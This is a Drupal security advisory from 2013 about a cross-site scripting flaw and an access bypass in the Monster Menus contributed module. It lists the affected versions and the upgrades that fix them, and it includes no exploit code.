View online: https://drupal.org/node/2059823 * Advisory ID: DRUPAL-SA-CONTRIB-2013-066 * Project: Monster Menus [1] (third-party module) * Version: 6.x, 7.x * Date: 2013-August-07 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - Monster Menus enables you to create granular page permissions, and apply them to a hierarchical page structure. The mm_webform submodule enables you to assign permissions derived from Monster Menus to webform forms. The module doesn't sufficiently filter titles entered into page settings and echoes the supplied title back to the next user editing the settings, thereby allowing a Cross Site Scripting attack (XSS). This vulnerability is mitigated by the fact that an attacker must have the ability to add pages to the Monster Menus tree, and must also entice another user to edit the settings of a maliciously-crafted page. The mm_webform submodule doesn't correctly prohibit users with only Who can read data submitted to this webform permission from deleting webform submissions leading to an Access Bypass. This vulnerability is mitigated by the fact that an attacker must have an active login which is permitted to read a webform's submissions. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Monster Menus 6.x-6.x versions prior to 6.x-6.61. * Monster Menus 7.x-1.x versions prior to 7.x-1.13. Drupal core is not affected. If you do not use the contributed Monster Menus [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Monster Menus module for Drupal 6.x, upgrade to Monster Menus 6.x-6.61 [5] * If you use the Monster Menus module for Drupal 7.x, upgrade to Monster Menus 7.x-1.13 [6] Also see the Monster Menus [7] project page. REPORTED BY - * Five Colleges, Inc. FIXED BY * Dan Wilga [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/monster_menus [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/monster_menus [5] https://drupal.org/node/2059807 [6] https://drupal.org/node/2059805 [7] http://drupal.org/project/monster_menus [8] http://drupal.org/user/56892 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/